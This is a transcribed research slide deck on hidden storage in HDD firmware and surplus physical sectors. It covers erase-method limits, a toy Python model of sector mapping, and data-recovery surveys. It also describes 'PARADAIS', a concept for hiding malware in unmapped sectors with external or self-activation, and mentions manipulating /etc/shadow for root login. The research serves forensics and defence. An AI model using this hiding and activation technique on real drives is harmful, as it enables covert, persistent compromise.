Digital Forensic Investigator – Examining digital evidence
Cyber Security Researcher – On hidden data area in HDD
https://www.facebook.com/dai.shimogaito
6. 1. DISK
This circular flat disk, like a mirror, is the data recording DISK.
This part holds DATA and Firmware.
7. 2. Head Stack Assembly ( HSA, Head )
The Read and Write HEAD is located at the tip of the black rectangular part, the SLIDER.
8. 3. PCB ( Printed Circuit Board )
The Main Controller and ROM are located here.
ROM contains the 1st part of the firmware.
Also on the PCB: Data port, Power port, RAM.
9. 4. Firmware
Firmware is the implemented software for controlling the movement of DISK and HSA to Read/Write data.
ROM contains the starting part of the firmware.
DISK contains the rest of the firmware.
10. SA and UA
SA Service Area
Most of the firmware ( SA modules ) is stored
UA User Area
User data such as operating system, pictures,
and document files and directories are saved
Spare sectors are here
11. SA and SA Module
SA Service Area
Most of the firmware ( SA modules ) is stored
SA Module
Each module has its own function as firmware
such as P-List, G-List, S.M.A.R.T. and ATA-PW.
The number of SA modules differs depending
on the design of the product
12. What happens during HDD booting
1. Power ON
2. Controller reads ROM
3. Disk spins up and Head moves to SA
4. Controller reads SA Modules
5. Ready
13. What happens during HDD booting
[ Figure: from Power ON to Ready, the Controller loads ROM and then each SA Module into RAM ]
14. What happens during HDD booting
[ Figure: Power ON -> Ready ( normal case ) beside Power ON -> Not Ready ( SA Module could not be loaded into RAM ) ]
The cause could be,,,,
1. Head is bad for reading the SA Module
2. Disk area for the SA Module is bad
3. The content of the SA Module is bad
Result: "Operating System not found" ; impossible to access any data
15. Internal Sector Location Management
[ Figure: Head 0 / Head 1 ]
Which Cylinder ( = Track ) ?
Which Head ( = Surface ) ?
Which Sector ?
By CHS, the physical location of a sector inside the HDD can be specified.
PBA ( Physical Block Address ) is assigned to each physical sector.
PBA 0 = CHS( 0 , 0 , 0 )
PBA 1 = CHS( 0 , 0 , 1 )
PBA 2 = CHS( 0 , 0 , 2 )
PBA 3 = CHS( 0 , 0 , 3 )
PBA 4 = CHS( 0 , 0 , 4 )
PBA 5 = CHS( 0 , 0 , 5 )
,
PBA 10 000 000 = CHS( 234 , 1 , 18 )
PBA 10 000 001 = CHS( 234 , 1 , 19 )
PBA 10 000 002 = CHS( 234 , 1 , 20 )
PBA 10 000 003 = CHS( 234 , 1 , 21 )
PBA 10 000 004 = CHS( 234 , 1 , 22 )
PBA 10 000 005 = CHS( 234 , 1 , 23 )
,
Inside the HDD, a sector is specified by PBA instead of LBA.
* The values are not actual information. This is an example.
17. Physical sectors & LBA / ! misunderstanding !
Are the total numbers of physical sectors equal ?
[ Figure legend: physical sector to which LBA is not mapped ]
18. Physical sectors & LBA / ! misunderstanding !
Is LBA mapped to all the physical sectors ?
[ Figure legend: physical sector to which LBA is not mapped / physical sector to which LBA is mapped ]
19. Physical sectors & LBA / ! misunderstanding !
NO !
[ Figure legend: physical sector to which LBA is not mapped / physical sector to which LBA is mapped ]
20. Total Number of Physical Sectors differs HDD to HDD
[ Figure: HDD-A / HDD-B / HDD-C, PHASE-01. Legend: physical sector to which LBA is not mapped / physical sector to which LBA is mapped ]
21. Primary Defects on Disk ( P-List )
The list of the location information of the sectors to which the factory has skipped mapping LBA is called "P-List".
P-List ( Primary Defects List )
P-List is saved in SA as an SA Module
P-List is a unique and essential part of the firmware
[ Figure: HDD-A / HDD-B / HDD-C, PHASE-02. Legend: physical sector to which LBA is not mapped / physical sector to which LBA is mapped / physical sector to which the factory has skipped mapping LBA ]
22. At the time of Factory Shipment
An equal number of LBAs is mapped to each HDD
so that the capacity would be the same
[ Figure: HDD-A / HDD-B / HDD-C, PHASE-03. Legend: physical sector to which LBA is not mapped / physical sector to which LBA is mapped / physical sector to which the factory has skipped mapping LBA ]
23. Focus on LBA mapped sectors distribution
Accessible sectors are physically NOT continuous from the 1st LBA to the last LBA
[ Figure: HDD-A / HDD-B / HDD-C, PHASE-04 ]
24. Total number of LBAs is equal for each HDD
Accessible sectors are physically NOT continuous from the 1st LBA to the last LBA
On the contrary, accessible sectors are logically continuous from the 1st LBA to the last LBA
[ Figure: HDD-A / HDD-B / HDD-C, PHASE-04 and PHASE-05 ]
25. Let's see how Bad Sectors appear
At the time of Factory Shipment : Mint Condition
[ Figure: HDD-A / HDD-B / HDD-C, PHASE-03. Legend: physical sector to which LBA is not mapped / physical sector to which LBA is mapped / physical sector to which the factory has skipped mapping LBA ]
26. Bad Sectors after Bad Sector Reallocation
The list of the location information of bad sectors after bad sector reallocation is called "G-List".
G-List ( Growth Defects List )
G-List is saved in SA as an SA Module
G-List is a unique and essential part of the firmware
After G-List is cleared, past data may appear.
[ Figure: HDD-A / HDD-B / HDD-C, PHASE-06. Legend: physical sector to which LBA is not mapped / physical sector to which LBA is mapped / physical sector to which the factory has skipped mapping LBA / bad sector after bad sector reallocation ]
27. Bad Sectors after Bad Sector Reallocation
[ Figure: HDD-A / HDD-B / HDD-C, PHASE-06 and PHASE-07. Legend: physical sector to which LBA is not mapped / physical sector to which LBA is mapped / physical sector to which the factory has skipped mapping LBA / bad sector after bad sector reallocation ]
28. Possible to access bad sectors only by E-SE
Q1. Can we access the LBA mapped physical sectors ?
A1. YES
Q2. Can we access the Bad Sectors, after bad sector reallocation, to which LBA is not mapped ?
A2. Basically NO, but Enhanced Secure Erase can access them exceptionally for trying to erase data.
[ Figure: PBA - Firmware - LBA, HDD-B at PHASE-07 and PHASE-08. Legend: physical sector to which LBA is not mapped / physical sector to which LBA is mapped / physical sector to which the factory has skipped mapping LBA / bad sector after bad sector reallocation ]
29. Comparison of 3 data erase methods for HDD
Method                                        | Area which may be erased
----------------------------------------------|---------------------------------------------------------------
Secure Erase ( ATA Command / Purge )          | Limited to the LBA mapped area
Enhanced Secure Erase ( ATA Command / Purge ) | One and Only method which may erase the Largest data area ( LBA mapped sectors & bad sectors after bad sector reallocation )
Data Erase Software ( Overwrite / Clear )     | Limited to the LBA mapped area, or less
Shown only the physical sectors which may be erased ( accessed ) by each method
[ Figure: HDD-B at PHASE-08, PHASE-08 and PHASE-07&08. Legend: physical sector to which LBA is mapped / bad sector after bad sector reallocation ]
30. Comparison of 3 data erase methods for HDD
Method                                        | Area which may be erased
----------------------------------------------|---------------------------------------------------------------
Secure Erase ( ATA Command / Purge )          | Limited to the LBA mapped area
Enhanced Secure Erase ( ATA Command / Purge ) | One and Only method which may erase the Largest data area ( LBA mapped sectors & bad sectors after bad sector reallocation )
Data Erase Software ( Overwrite / Clear )     | Limited to the LBA mapped area, or less
All the physically existing sectors are shown
[ Figure: HDD-B at PHASE-06 ( three panels ). Legend: physical sector to which LBA is not mapped / physical sector to which LBA is mapped / physical sector to which the factory has skipped mapping LBA / bad sector after bad sector reallocation ]
31. Survey of total physical sectors in 3 HDDs
2TB SATA HDD * 3
Same model, Same capacity
( Capacity: 3 907 029 168 LBA )
                      HDD-A            HDD-B            HDD-C
Total PBA             3 931 988 368    3 933 712 984    3 933 659 976
Difference from LBA      24 959 200       26 683 816       26 630 808
Difference in Bytes  12 779 110 400   13 662 113 792   13 634 973 696
Difference in %              0.635%           0.678%           0.677%
( Total PBA ) - ( Total LBA ) = Difference = Surplus Physical Sectors
32. Survey of total physical sectors in 3 HDDs
Surplus Physical Sectors are inaccessible,
because LBAs are not mapped to them
PBA Firmware LBA
What if there is DATA ?
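The addressing model of the preceding slides (CHS and PBA, the P-List, LBA mapping at factory shipment, G-List reallocation, the reach of the three erase methods, and the surplus-sector count of the survey) worked through as an added Python example. This is not code from the talk or from any drive vendor: the geometry (a constant number of sectors per track), the P-List and G-List entries, the spare-pool behaviour and every sector payload are constructed assumptions, and the reach of each erase method follows the comparison slide rather than any ATA specification detail. It shows which physical sectors still hold data after each method, and that a surplus sector is reached only once an LBA has been mapped to it.

```python
"""Toy model of HDD sector addressing and data-erase reach.

Added illustration for this deck, not code from the talk or from any vendor
tool. Geometry, P-List, G-List and payloads are all constructed; real drives
use zoned recording and vendor-specific firmware.
"""
from dataclasses import dataclass, field
from typing import Optional


@dataclass
class ToyHDD:
    cylinders: int
    heads: int
    spt: int                                        # sectors per track (constant here)
    p_list: set = field(default_factory=set)        # P-List: PBAs the factory never mapped
    g_list: dict = field(default_factory=dict)      # G-List: bad PBA -> spare PBA it moved to
    lba_map: list = field(default_factory=list)     # index = LBA, value = PBA
    spare_pool: list = field(default_factory=list)  # usable PBAs with no LBA (surplus)
    data: dict = field(default_factory=dict)        # PBA -> payload physically present

    @property
    def total_pba(self) -> int:
        return self.cylinders * self.heads * self.spt

    def chs_to_pba(self, c: int, h: int, s: int) -> int:
        """CHS -> PBA, the drive-internal address the firmware works with."""
        return (c * self.heads + h) * self.spt + s

    def pba_to_chs(self, pba: int) -> tuple:
        c, rem = divmod(pba, self.heads * self.spt)
        h, s = divmod(rem, self.spt)
        return (c, h, s)

    def factory_map(self, capacity_lba: int) -> None:
        """PHASE-02/03: skip P-List sectors, map the same LBA count on every unit."""
        usable = [p for p in range(self.total_pba) if p not in self.p_list]
        self.lba_map = usable[:capacity_lba]
        self.spare_pool = usable[capacity_lba:]     # remaining good sectors: spares

    def surplus_sectors(self) -> int:
        """( Total PBA ) - ( Total LBA ), as on the survey slide."""
        return self.total_pba - len(self.lba_map)

    def write(self, lba: int, payload: bytes) -> None:
        self.data[self.lba_map[lba]] = payload

    def read(self, lba: int) -> Optional[bytes]:
        return self.data.get(self.lba_map[lba])

    def reallocate(self, lba: int) -> None:
        """Bad-sector reallocation: G-List entry, LBA now points at a spare.
        The old PBA keeps whatever was written there (slide 26)."""
        old = self.lba_map[lba]
        new = self.spare_pool.pop(0)
        self.g_list[old] = new
        self.lba_map[lba] = new

    def reachable(self, method: str) -> set:
        """Physical sectors each erase method may touch (comparison slide)."""
        mapped = set(self.lba_map)
        if method in ("overwrite", "secure_erase"):
            return mapped                           # limited to the LBA-mapped area
        if method == "enhanced_secure_erase":
            return mapped | set(self.g_list)        # also reallocated bad sectors
        raise ValueError(f"unknown erase method: {method}")

    def erase(self, method: str) -> None:
        for pba in self.reachable(method):
            self.data.pop(pba, None)

    def remap_surplus(self) -> None:
        """Give every usable surplus PBA an LBA so ordinary tools can reach it."""
        self.lba_map.extend(self.spare_pool)
        self.spare_pool = []


def build_drive() -> ToyHDD:
    """Constructed scenario: 64 physical sectors, 48 LBAs, one reallocation,
    and one payload sitting in a surplus sector that no LBA points at."""
    hdd = ToyHDD(cylinders=4, heads=2, spt=8, p_list={3, 17})
    hdd.factory_map(capacity_lba=48)
    hdd.write(5, b"user data v1")       # lands in PBA 6 (PBA 3 skipped by P-List)
    hdd.reallocate(5)                   # PBA 6 goes bad, LBA 5 -> first spare, PBA 50
    hdd.write(5, b"user data v2")
    hdd.data[60] = b"payload in surplus sector"   # constructed: on the platter, unmapped
    return hdd


def surviving_pbas(method: str, remap_first: bool = False) -> set:
    """PBAs that still hold data after one pass of the given erase method."""
    hdd = build_drive()
    if remap_first:
        hdd.remap_surplus()
    hdd.erase(method)
    return set(hdd.data)


def surplus_report(total_pba: int, total_lba: int, sector_bytes: int = 512) -> tuple:
    """Surplus sectors, bytes and % of PBA, as the survey slide tabulates."""
    diff = total_pba - total_lba
    return diff, diff * sector_bytes, round(diff / total_pba * 100, 3)


if __name__ == "__main__":
    d = build_drive()
    print("PBA 50 is CHS", d.pba_to_chs(50), "; surplus sectors:", d.surplus_sectors())
    for m in ("overwrite", "secure_erase", "enhanced_secure_erase"):
        print(f"{m:22s} leaves data in PBAs {sorted(surviving_pbas(m))}")
    print("remap surplus, then enhanced secure erase:",
          sorted(surviving_pbas("enhanced_secure_erase", remap_first=True)))
    print("HDD-A from the survey:", surplus_report(3_931_988_368, 3_907_029_168))
```

Running it shows the old copy of LBA 5 surviving in the reallocated PBA 6 after overwrite or Secure Erase, only the surplus sector's payload surviving Enhanced Secure Erase, and nothing surviving once the surplus sectors have been mapped first. The last line reproduces the HDD-A row of the survey table (24 959 200 sectors, 12 779 110 400 bytes, 0.635%) from its two published totals.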
36. Firmware defines the appearance of DATA
[ Figure: LBA - PBA - Firmware 1 beside LBA - PBA - Firmware 2 ]
The physical location of the MBR ( LBA 0 ) may even differ depending on the firmware
LBA is NOT always mapped to the same PBA forever. It's UNSTABLE !
[ Figure: HDD-B at PHASE-08, PHASE-14 and PHASE-01 ]
37. P A R A D A I S
When LBAs are mapped to the surplus physical sectors, they become accessible,
although they used to be inaccessible even by Enhanced Secure Erase.
1. It may remain even after initializing and formatting.
2. It may remain even after OS installation / reinstallation.
3. Malware may preexist, but there is no way to detect it.
4. Inaccessible by conventional methods.
5. Any software and data may be stored.
6. There is no restriction.
7. Whatever you want.
8. Free space FOR "SOMEONE"
[ Figure: LBA - PBA - Firmware, HDD-B at PHASE-10 ]
38. 3 year old HDD may look like these
[ Figure: HDD-A / HDD-B / HDD-C, PHASE-06. Legend: physical sector to which LBA is not mapped / physical sector to which LBA is mapped / physical sector to which the factory has skipped mapping LBA / bad sector after bad sector reallocation ]
39. PARADAIS
[ Figure: HDD-A / HDD-B / HDD-C, PHASE-06 and PHASE-09. Same legend as slide 38 ]
40. PARADAIS
[ Figure: HDD-A / HDD-B / HDD-C, PHASE-06 and PHASE-10. Legend as slide 38, plus: PARADAIS ]
41. PARADAIS
[ Figure: HDD-A / HDD-B / HDD-C, PHASE-06 and PHASE-11. Legend as slide 38, plus: PARADAIS ]
42. PARADAIS
[ Figure: HDD-A / HDD-B / HDD-C, PHASE-06 and PHASE-12. Legend as slide 38, plus: PARADAIS ]
43. PARADAIS
[ Figure: HDD-A / HDD-B / HDD-C, PHASE-06 and PHASE-13. Legend as slide 38, plus: PARADAIS ]
44. Are these physically acquired disk images ?
Could be, but not always.
[ Figure: HDD-A / HDD-B / HDD-C, PHASE-05 ]
45. These have been missed by disk imaging tools
[ Figure: HDD-A / HDD-B / HDD-C ]
46. PARADAIS Activation
PARADAIS can be activated either by an external or an internal trigger.
1. External Activation
When a certain ATA command is sent to the HDD, PARADAIS may become ready to be activated
for the next power ( boot ) session.
2. Internal ( Self ) Activation
Without any external trigger, it may be activated. Just wait until it gets activated, someday.
This trigger works for offline PCs; therefore the activation may occur even in
air-gapped control systems.
[ Screenshot: manipulating /etc/shadow for login to Debian Linux as root ]
[ Screenshot: /etc/shadow ; without external operation, an unidentified partition appeared suddenly after reboot ]
47. PROBLEMS ( Product Liability )
Consumers & Users : "You should be responsible for the accident ! I will sue you !"
Vendors & Makers : "We had never expected such an incident."
48. PROBLEMS ( Digital Forensics )
Court Judge : "Are you sure ?"
Law Enforcement : "Your honor, we've examined all the data area of the HDD. The physically extracted image file is a perfect copy of the HDD."
49. PROBLEMS ( Hostage for RANSOM )
Victim : "My data is gone,,,"
Criminal : "Your data is in your HDD, but inaccessible for you. If you pay me ransom, your data would be back."
53. Solutions for PARADAIS activation
1. HDD inspection before use
The more critical the data is, the better it is to inspect the firmware of the HDD before use.
Block the activation of PARADAIS even if there is unidentified data there.
To do so, firmware inspection would be useful to eliminate the activating mechanism.
Erase data on the surplus physical sectors.
To do so, LBAs must first be mapped to the surplus physical sectors; only then can the data be erased.
2. Select reliable distribution channels
Who do you buy HDD from ? Why do you buy HDD from them ?
54. This research is going on / Important Notice
Although I have described the mechanism of HDD and PARADAIS, it is unknown if
PARADAIS exists in all HDD products of all the manufacturers.
It could be possible that it exists only in several models that I have verified so far,
because the structure and the mechanism differ depending on the design of each
manufacturer and model.
To make it more precise and clear, it is preferable to explain on each different
product. However, it could affect the product's reliability. So I've been avoiding
mentioning the name of the products and the manufacturers so far.
I would appreciate your understanding.
There is still room for investigation into which manufacturers' products this PARADAIS may exist in, and to what extent. Because the structure of an HDD also differs according to each manufacturer's design, verification in line with each product's design and specifications would normally be required to ensure greater concreteness and accuracy. However, considering that the findings of this research could affect the reliability of particular manufacturers or products, I am refraining at this point from actively publishing specific manufacturer or product names.
I ask for your understanding on this point.
59. The 1st step of the research completed with a good result
[ Figure: 0.02% -> 94%, UP ! ]
Newspaper : Nikkei Business Daily, 26th September 2013
This was a joint research with Kansai University
and Osaka Data Recovery ( daillo,inc. )
61. Survey of 12 DR cases
No. | Model           | Failure State                                      | Difficulty Level | After Cleaning by DDRH            | Effect
----|-----------------|----------------------------------------------------|------------------|-----------------------------------|-------
 1  | ST2000DM001     | Unable to boot / Abrasion Powder                   | B                | Improvement in serial port output | C
 2  | ST2000DM001     | Unable to boot / Abrasion Powder                   | B                | Improvement in serial port output | C
 3  | WD10EADS-22M2B0 | Unable to boot / HSA Replacement / FW Modification | D                | Read error partly solved          | B
 4  | SV1203N         | Unable to boot / HSA Replacement / FW Modification | C                | Read error solved                 | B
 5  | ST3000DM001     | Unable to boot / HSA Replacement / FW Modification | C                | Improvement in serial port output | C
 6  | ST2000DM001     | Unable to boot / HSA Replacement / FW Modification | B                | Improvement in serial port output | C
 7  | ST2000DM001     | Abrasion Powder a lot                              | A                | No improvement                    | D
 8  | ST1000DM003     | Bootable                                           | E                | No change in serial port output   | D
 9  | ST3000DM001     | Unable to boot / HSA Replacement / FW Modification | C                | Read error partly solved          | C
10  | ST31000528AS    | Unable to boot / FW Modification                   | C                | Read error partly solved          | C
11  | ST1000DM003     | Unable to boot / HSA Replacement / FW Modification | C                | Read error partly solved          | C
12  | ST3000DM001     | Unable to boot                                     | B                | Became bootable                   | A
Difficulty Level
A : Disk surface totally turned into abrasion powder
B : Disk Scratched Damage
C : HSA Replacement and more processes required
D : HSA Replacement required
E : Minor Failure ( Part replacement not required )
Effect
A : Remarkable improvement
B : Significant improvement *1
C : Improved
D : No effect
E : Became Worse
This survey report was submitted to Osaka city
because the research and the development of
DDRH were partly funded by Osaka city subsidy
program in March 2016.
*1 More than 1000 read error sectors solved
62. Survey of 12 DR cases
Cleaning Effect by DDRH
Remarkable improvement : 8%
Significant improvement : 17%
Improved : 58%
No effect : 17%
Became worse : 0%
Difficulty Level of Data Recovery
Disk surface totally turned into abrasion powder : 8%
Disk Scratched Damage : 34%
HSA Replacement and more processes : 42%
HSA Replace : 8%
Minor failure : 8%
Disk surface cleaning worked for approx. 80% of the DR cases.
63. Ongoing Research
[ Figure: FIRMWARE & PARADAIS ( Bad ) / Lubricant Layer & Disk Surface Cleaning ( Good ) ]
Thank you very much for attending this lecture !